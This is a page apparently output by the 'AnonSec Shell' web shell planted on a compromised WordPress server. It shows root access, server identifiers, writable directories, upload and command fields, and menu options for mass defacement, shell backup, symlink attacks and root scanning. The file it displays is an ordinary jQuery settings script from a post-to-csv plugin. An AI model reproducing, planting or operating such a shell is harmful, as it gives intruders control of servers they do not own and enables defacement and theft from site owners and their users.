AnonSec Shell
Server IP : 104.21.14.48  /  Your IP : 18.119.164.58   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/chroot/var/www/wp-content/plugins/post-to-csv/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/chroot/var/www/wp-content/plugins/post-to-csv/js/script.js
(function($) {
	$(document).ready( function() {
		$( '.psttcsv_select_all' ).on( 'change', function() {
			if ( $( this ).is( ':checked' ) ) {
				$( this ).closest( 'fieldset' )
					.find( 'input[type="checkbox"]:visible:not(.psttcsv_select_all)' )
					.attr( 'checked', true )
					.trigger( 'change' );
			} else {
				$( this ).closest( 'fieldset' )
					.find( 'input[type="checkbox"]:visible:not(.psttcsv_select_all)' )
					.removeAttr( 'checked' )
					.trigger( 'change' );
			}
		} );

		$( '[name="psttcsv_post_type[]"], [name="psttcsv_fields[]"], [name="psttcsv_status[]"], [name="psttcsv_comment_fields[]"], [name="psttcsv_comment_fields[]"], [name="psttcsv_status_woocommerce[]"], [name="psttcsv_product_type_woocommerce[]"], [name="psttcsv_product_category_woocommerce[]"]' ).on( 'change', function() {
			var $element = $( this ),
				$parent = $element.closest( 'fieldset' ),
				$checkboxes = $parent.find( 'input[type="checkbox"]:not(.psttcsv_select_all)' );
				$enabled_checkboxes = $checkboxes.filter( ':checked' );
				if ( $checkboxes.length && $checkboxes.length == $enabled_checkboxes.length ) {
					$parent.find( '.psttcsv_select_all' ).attr( 'checked', true );
				} else {
					$parent.find( '.psttcsv_select_all' ).removeAttr( 'checked' );
				}
		} ).trigger( 'change' );

		$( '.psttcsv_checkbox_select' ).on( 'change', function() {
			var $checkbox = $( this ),
				$parent_elem = $checkbox.closest( 'fieldset' ),
				$all_checkboxes = $parent_elem.find( 'input[type="checkbox"]:not(.psttcsv_select_all)' ),
				$visible_checkboxes;

			if(  $( '#psttcsv-show-hidden-meta' ).is( ':checked' )  ) {
				$visible_checkboxes = $all_checkboxes;
			} else {
				$visible_checkboxes  = $all_checkboxes.filter( function() {
					if( $( this ).closest( 'div' ).hasClass( 'psttcsv-hidden-option' ) ) {
						return 0;
					} else {
						return 1;
					}
				});
			}

			var $enabled_checkboxes = $visible_checkboxes.filter( ':checked' );
			if ( $visible_checkboxes && $enabled_checkboxes.length == $visible_checkboxes.length ) {
				$parent_elem.find( '.psttcsv_select_all' ).attr( 'checked', true );
			} else {
				$parent_elem.find( '.psttcsv_select_all' ).removeAttr( 'checked' );
			}
		} ).trigger( 'change' );

		$( '#psttcsv-show-hidden-meta' ).on( 'change', function () {
			if ( $( this ).is( ':checked' ) ) {
				$( '.psttcsv-hidden-option' ).show();
			} else {
				$( '.psttcsv-hidden-option' ).hide();
			}
			$( '.psttcsv_checkbox_select' ).trigger( 'change' );
		} ).trigger( 'change' );

		/* Custom Fields tab accordion */
		$( function() {
			$( "#psttcsv-accordion" ).accordion( {
				heightStyle: "content",
				active: false,
				collapsible: true
			} );
		} );

		/* Custom Fields tab accordion */
		$( function() {
			$( "#psttcsv-accordion-woocommerce" ).accordion( {
				heightStyle: "content",
				active: false,
				collapsible: true
			} );
		} );


		/* Custom Fields tab accordion */
		$( function() {
			$( "#psttcsv-accordion-taxonomies" ).accordion( {
				heightStyle: "content",
				active: false,
				collapsible: true
			} );
		} );

		$( 'input[name="psttcsv_export_type"]' ).on( 'change', function () {
			if ( $( this ).is( ':checked' ) ) {
				switch ( $( this ).val() ) {
					case 'post_type' :
						$( '#psttcsv-taxonomies-block' ).hide();
						$( '#psttcsv-posttype-block' ).show();
						break;
					case 'taxonomy' :
						$( '#psttcsv-posttype-block' ).hide();
						$( '#psttcsv-taxonomies-block' ).show();
						break;
				}
			}
		} ).trigger( 'change' );

		$( '.bws_form input, .bws_form textarea, .bws_form select' ).bind( "change paste select", function() {
			if ( $( this ).attr( 'type' ) != 'submit' ) {
				$ ( '.psttcsv_export_notice' ).show();
			}
		});
		$( 'form.bws_form' ).on( 'submit', function() {
			$ ( '.psttcsv_error' ).hide();
		});
	} );
} )(jQuery);

Anon7 - 2022
AnonSec Team